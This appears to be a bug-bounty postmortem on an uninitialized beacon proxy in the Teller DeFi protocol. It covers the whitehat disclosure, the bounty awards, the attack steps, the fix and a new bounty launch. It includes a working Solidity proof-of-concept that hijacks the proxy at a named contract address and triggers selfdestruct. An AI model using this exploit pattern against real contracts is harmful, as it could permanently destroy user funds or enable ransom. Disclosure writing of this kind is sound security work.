Teller Bug Fix Postmorten and Bug Bounty Launch

Summary

Whitehat Bugdefeat disclosed a critical vulnerability in Teller to Immunefi on July 30. That vulnerability, which consisted of an uninitialized proxy, could have led to a loss of more than 1 million DAI if exploited. No user funds were lost, and the vulnerability has been patched. Although Teller didn’t have a bug bounty program at the time of the report, they are awarding the whitehat with a $50,000 bounty. Since more than 1 million in funds were at risk, the whitehat will also receive the Founders Bounty, offered by ArmorFi CTO Robert Forster via Immunefi. The Founders Bounty is a reward of 125,000 ARMOR tokens, vested over 24 months, which is given out to any hacker who finds a vulnerability in any live Ethereum project where more than 1 million in funds is at risk.

After this stunning success with responsible disclosure, Teller is joining Immunefi with a bug bounty today, featuring a $50,000 award for critical vulnerabilities. You can find more details on Teller’s bug bounty page.

Vulnerability Analysis

The main vulnerability concerned the use of proxy contracts to make Teller contracts upgradeable.

Teller employs the beacon pattern of proxy contracts. The basic idea of this pattern is that the beacon proxy knows the address of the beacon, and the beacon itself points to the implementation code. The beacon proxy then calls that implementation code and uses it as its actual logic. It’s not hard to see how this makes upgrading contracts easier, as when there’s an update, the beacon is informed of the new implementation. Thus, whenever the proxy asks the beacon where the implementation is, it receives a new one and executes it.

However, in Teller’s case, the beacon proxy (InitializeableBeaconProxy) was not initialized and could have been initialized by anyone, including a hypothetical malicious attacker. As long as the address remained 0, anyone could have set the beacon’s address, thus breaking the protocol.

The step by step attack is as follows:

Create a malicious implementation contract which contains a function that will selfdestruct the contract.Create a malicious beacon, which points to that fake implementationInitialize the beacon proxy to tell the beacon proxy the address of the malicious beaconCall the beacon contract, which calls the malicious beacon, which then uses a delegatecall to the malicious implementation, at which point the the malicious implementation instructs the beacon proxy to selfdestruct

Once the beacon proxy self-destructs, the tokens (in this case, more than 1 million DAI) are unrecoverable, so while the attacker does not directly realize any of those funds, the protocol itself is permanently broken and user funds lost. This attack vector could have also been used to hold the protocol ransom.

The whitehat’s POC code is available below:

interface InitializeableBeaconProxy { function initialize(address beacon, bytes memory data) external payable; function kill() external; }contract Killer { function kill() public{ selfdestruct(msg.sender); } function implementation() public returns (address){
return address(this);
}}contract Attack { function run() external {
InitializeableBeaconProxy ibp = InitializeableBeaconProxy(0x08162332b1C13E6d1E80AC0D756aF255d218DC20); Killer killer = new Killer();
ibp.initialize(address(killer), “”);
ibp.kill();
killer.kill(); }}

Vulnerability Fix

The fix was simple. Teller initialized the beacon proxy to an address value of 1. There is nothing on this address, but it is a valid input. So, if an attacker tries to initialize the beacon proxy, since the proxy isn’t 0, it cannot be reinitialized. Any call to the beacon proxy causes the proxy to ask address 1 where the implementation is, but since 1 doesn’t have that information, the call fails and nothing happens.

Acknowledgements

We thank the Teller team for their fast and effective response to the disclosure. Teller fixed the critical bug and generously paid out a bounty to the whitehat. They would also like to thank Immunefi for helping to facilitate disclosure assistance. In the aftermath of the disclosure, Teller has decided to host a bug bounty with Immunefi, which launches today.

If you’re interested in protecting your project with a bug bounty like Teller, visit the Immunefi services page and fill out the form.